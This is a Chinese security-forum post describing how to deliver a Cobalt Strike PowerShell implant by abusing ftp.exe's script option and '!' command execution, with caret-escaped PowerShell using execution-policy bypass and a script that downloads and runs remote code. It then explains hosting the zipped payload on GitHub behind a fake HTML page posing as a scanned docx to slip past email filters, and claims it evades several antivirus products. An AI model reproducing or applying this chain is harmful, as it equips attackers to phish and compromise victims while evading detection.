技术社区
安全培训
技术社群
积分商城
先知平台
漏洞库
历史记录
清空历史记录
相关的动态
相关的文章
相关的用户
相关的圈子
相关的话题
注册
登录
FTP免杀绕过杀软及钓鱼绕过邮箱检测
执着于web安全研究
渗透测试
516浏览 · 2025-03-04 03:12
返回文档
FTP免杀Bypass杀软
CS服务端制作远程恶意ps1文件
CS服务端启动
然后客户端连上,然后建立监听器,之后生成powershell恶意文件
图片加载失败
a.ps1文件内容如下
制作恶意ftp命令执行
注意需要将起始位置置空,然后目标写入
1
-""s:aaa.dll
:
○
这部分是传递给
ftp.exe
的参数。
○
-s
是
ftp.exe
的一个标准参数,用于指定一个包含 FTP 命令的脚本文件。
○
""
是空字符串,是为了绕过某些安全检查或混淆命令。
○
good.dll` 是一个动态链接库文件(DLL),通常用于扩展程序功能。
图片加载失败
good.dll内容如下,原理是ftp命令模式下,输入
!
会命令执行
这是一种混淆的写法:
●
^
是转义字符,用于绕过简单的字符串检测
●
-exec bypass
是 PowerShell 的一个参数,用于绕过执行策略(Execution Policy),允许运行脚本。
●
.\\bad.ps1
:
○
这是要执行的 PowerShell 脚本文件路径,表示当前目录下的
bad.ps1
文件。
图片加载失败
然后bad.ps1 写入powershell命令
●
○
$ExeCuTiOnCoNtExT.InvOkeCoMmAnD.NeWScriPtBlOcK(...)
:创建一个新的脚本块并执行。
●
从指定 URL 下载内容并执行powershell脚本。
其中a文件是之前CS生产的powersshell命令文件,改一下名字就好了
只要打开快捷键,CS这边就会立刻上线
图片加载失败
注:用此方法可过所有静态查杀,动态的查杀像360杀毒,win defender可绕过,国内某些杀软比如火绒一调用powershell进程就报可疑
整体文件夹如下
图片加载失败
打包为zip上传到github复制下载链接,插入到伪造的html页面中的下载url中
通过html页面伪装为查杀后的docx文件,实际链接是木马下载地址
实际编辑的可视化效果如下图
图片加载失败
实际测试成功绕过邮箱检测发送给收件人,收件效果如下
图片加载失败
0
人收藏
0
人喜欢
转载
分享
0
条评论
某人
表情
可输入
255
字
评论
没有评论
发布投稿
热门文章
1
从零掌握java内存马大全(基于LearnJavaMemshellFromZero复现重组)
2
突破网络限制,Merlin Agent助你轻松搭建跳板网络!
3
从白帽角度浅谈SRC业务威胁情报挖掘与实战
4
基于规则的流量加解密工具-CloudX
5
从0到1大模型MCP自动化漏洞挖掘实践
近期热点
一周
月份
季度
1
从零掌握java内存马大全(基于LearnJavaMemshellFromZero复现重组)
2
突破网络限制,Merlin Agent助你轻松搭建跳板网络!
3
从白帽角度浅谈SRC业务威胁情报挖掘与实战
4
基于规则的流量加解密工具-CloudX
5
从0到1大模型MCP自动化漏洞挖掘实践
暂无相关信息
暂无相关信息
优秀作者
1
T0daySeeker
贡献值:38700
2
一天
贡献值:24800
3
Yale
贡献值:21000
4
1674701160110592
贡献值:18000
5
1174735059082055
贡献值:16000
6
Loora1N
贡献值:13000
7
bkbqwq
贡献值:12800
8
手术刀
贡献值:11000
9
lufei
贡献值:11000
10
xsran
贡献值:10600
目录
FTP免杀Bypass杀软
CS服务端制作远程恶意ps1文件
制作恶意ftp命令执行
转载
标题
作者:
你好
http://www.a.com/asdsabdas
文章
转载
自
复制到剪贴板
没有评论